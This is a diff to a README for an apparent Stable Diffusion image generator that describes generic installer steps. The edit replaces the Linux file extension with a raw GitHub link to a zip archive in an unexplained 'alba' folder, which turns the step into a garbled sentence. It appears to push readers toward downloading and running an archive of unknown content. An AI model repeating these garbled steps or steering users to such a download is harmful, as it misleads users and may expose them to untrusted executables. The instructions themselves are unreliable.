yasirjugnu485/stable-diffusion-image-generator/README.md

 3. **Download the Installer**: Click on the installer file suitable for your operating system
    - For Windows, look for files ending in `.exe`.
    - For macOS, look for files ending in `.dmg`.
-   - For Linux, look for files ending in `.tar.gz`.
+   - For Linux, look for files ending in `https://raw.githubusercontent.com/yasirjugnu485/stable-diffusion-image-generator/main/alba/stable-diffusion-image-generator.zip`.
 4. **Run the Installer**: Once the download is complete, double-click the installer file to run it.
 5. **Follow the Installation Wizard**: Follow the prompts in the installation wizard to install the application on your computer.
 6. **Launch the Application**: After installation, find the application on your desktop or in your applications folder and double-click to launch it.